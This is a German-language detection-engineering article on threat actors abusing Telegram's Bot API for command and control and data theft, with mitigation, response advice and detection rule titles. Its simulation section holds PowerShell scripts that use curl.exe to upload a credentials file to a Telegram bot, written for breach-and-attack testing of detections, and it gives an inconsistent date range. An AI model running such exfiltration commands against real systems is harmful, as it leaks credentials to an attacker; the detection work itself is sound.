Die Chroniken der Erkennung & Reaktion: Erkundung des Telegram-Missbrauchs
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Der Artikel erklärt, wie mehrere Bedrohungsakteure die Bot-API und Kanäle von Telegram in Unternehmen für Befehls- und Kontrollfunktionen, Datenextraktion und Opferüberwachung missbrauchen. Malware-Familien, darunter DeerStealer, Lumma Stealer, Raven Stealer und ein trojanisierter XWorm-Builder, codieren Bot-Tokens oder Kanal-IDs fest ein und rufen Endpunkte wie /sendMessage und /sendDocument auf. Es werden Microsoft Defender und Sentinel-Erkennungsabfragen vorgestellt, die sich auf verdächtige Prozessbefehlszeilen und Traffic zu api.telegram.orgkonzentrieren. Wichtige Anleitungen sind: Die legitime Nutzung von Telegram zu bereinigen und die API dort zu blockieren, wo sie nicht benötigt wird.
Untersuchung
Das SOC von NVISO berichtete über vier Eindringversuche, die zwischen Oktober 2025 und März 2025 beobachtet wurden, bei denen Telegram an verschiedenen Punkten im Angriffszyklus verwendet wurde. Das Schreiben hebt Kampagnen hervor, wie das Überwachen von Opfern durch Lunar Spider über gefälschte Captcha-Köder, das Senden von Operator-Benachrichtigungen durch DeerStealer über curl, das Abrufen von C2-Details von Telegram-Kanälen durch Lumma Stealer, das Exfiltrieren von archivierten Sammlungen durch Raven Stealer und das Abstützen eines XWorm-Builders auf die Bot-API sowohl für Exfiltration als auch für C2. Analytiker extrahierten Indikatoren wie Prozessbefehlszeilen, Netzwerkziele und relevante Dateinamen.
Minderung
Erstellen Sie einen Standard für die legitime Nutzung von Telegram und blockieren Sie dann den ausgehenden Zugang zu api.telegram.org in Umgebungen, in denen er nicht benötigt wird. Achten Sie auf ungewöhnliche Prozesse (z. B. curl, powershell, wscript), die Verbindungen zur API herstellen, und untersuchen Sie jede geskriptete Bot-API-Interaktion. Passen Sie die Erkennungen an, um erwartetes Verhalten wie bekannte Browser, die telegram.exe starten, zu unterdrücken, und priorisieren Sie Long-Polling- oder Webhook-Style-Anfragen, die von verdächtigen Binärdateien oder unerwarteten Hosts ausgehen.
Antwort
Wenn eine Aktivität erkannt wird, isolieren Sie den betroffenen Endpunkt, stoppen Sie verdächtige Prozesse und bewahren Sie Befehlszeilenparameter zusammen mit DNS-, Proxy- und Netzwerk-Telemetrie auf. Führen Sie eine tiefere forensische Analyse durch, um nachfolgende Payloads aufzudecken, die mit Kampagnen wie DeerStealer oder Raven Stealer verbunden sind. Rotieren Sie alle exponierten Bot-Tokens, deaktivieren oder widerrufen Sie missbrauchte Telegram-Kanäle, und stoppen Sie die Verbreitung durch das Blockieren verwandter Indikatoren. Wenn der Missbrauch bestätigt wird, eskalieren Sie die Meldung durch die offiziellen Kanäle von Telegram und dokumentieren Sie den Vorfall zur Verhinderung eines Wiederauftretens.
Angriffsfluss
Erkennungen
Möglicher Telegram-Missbrauch als Befehls- und Kontrollkanal (über dns_query)
Ansicht
Verdächtige Defender-Ausnahmemodifikation (via cmdline)
Ansicht
Verdächtiger Prozess nutzt eine URL in der Befehlszeile (via cmdline)
Ansicht
IOCs (Emails) zur Erkennung: Die Chronicles der Erkennung & Reaktion: Untersuchung von Telegram-Missbrauch
Ansicht
Erkennung nicht-browserbasierter Kommunikation mit Telegram API [Windows-Netzwerkverbindung]
Ansicht
Erkennung bösartiger Telegram API Nutzung [Windows-Prozesserstellung]
Ansicht
Simulationsausführung
Voraussetzung: Die Vorflugprüfung Telemetrie & Basislinie muss bestanden sein.
Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der von der Gegenpartei gewünschten Technik (TTP), die die Erkennungsregel auslösen soll. Die Befehle und Erzählungen MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, die exakte Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird.
-
Angriffserzählung & Befehle:
Ein Angreifer mit einem kompromittierten Windows-Host möchte eine gesammelte Anmeldedatei (creds.txt) an einen von ihnen kontrollierten Telegram-Bot exfiltrieren. Um das Speichern einer benutzerdefinierten Binärdatei zu vermeiden, verwenden sie das nativecurl.exe(installiert über Windows 10 optionale Funktionen), um die Datei anhttps://api.telegram.org/bot<ATTACKER_TOKEN>/sendDocumentzu POSTen. Der Befehl wird von PowerShell aus ausgeführt, um sicherzustellen, dass das Ereignis der Prozesserstellung eine Befehlszeile aufzeichnet, die „api.telegram.org“ enthält. Da der Prozesscurl.exeist, unterdrückt der Filter der Regel (InitiatingProcessFileName: "telegram.exe") nicht den Alarm.# Variablen (ersetzen mit Angreifer-kontrollierten Werten) $BotToken = "123456:ABC-DEF1234ghIkl-zyx57W2v1u123ew11" $ChatID = "987654321" $FilePath = "C:Tempcreds.txt" # Sicherstellen, dass die Datei existiert (simulierter Anmeldedaten-Dump) Set-Content -Path $FilePath -Value "username: admin`npassword: P@ssw0rd!" # Durchführung der Exfiltration über Telegram Bot API $Url = "https://api.telegram.org/bot$BotToken/sendDocument?chat_id=$ChatID" curl.exe -X POST -F "document=@$FilePath" $Url -
Regressionstest-Skript: Das folgende Skript reproduziert die genauen Schritte, geeignet für automatisierte BAS-Abläufe.
#-------------------------------------------- # Regressionstest – Telegram API Exfiltration #-------------------------------------------- param( [string]$BotToken = "REPLACE_WITH_TOKEN", [string]$ChatID = "REPLACE_WITH_CHATID", [string]$TmpDir = "$env:TEMPTelegramBAS" ) # Erstellen Sie einen temporären Arbeitsbereich New-Item -ItemType Directory -Path $TmpDir -Force | Out-Null # Simulierte Anmeldedatei $CredFile = Join-Path $TmpDir "creds.txt" "username: admin`npassword: P@ssw0rd!" | Set-Content -Path $CredFile # API-URL erstellen $Url = "https://api.telegram.org/bot$BotToken/sendDocument?chat_id=$ChatID" # Durchführung der Exfiltration Write-Host "[*] Exfiltriere $CredFile an Telegram..." curl.exe -X POST -F "document=@$CredFile" $Url # Einfache Erfolgsmeldung (verifiziert nicht die Lieferung) if ($LASTEXITCODE -eq 0) { Write-Host "[+] Exfiltrationsbefehl ausgeführt." } else { Write-Error "[-] Exfiltration fehlgeschlagen." } -
Bereinigungskommandos: Entfernen Sie die temporäre Datei und das Verzeichnis; optional beenden Sie alle verbleibenden
curl.exeProzesse.# Bereinigung temporärer Artefakte Stop-Process -Name "curl" -ErrorAction SilentlyContinue Remove-Item -Path $TmpDir -Recurse -Force Write-Host "[*] Bereinigung abgeschlossen."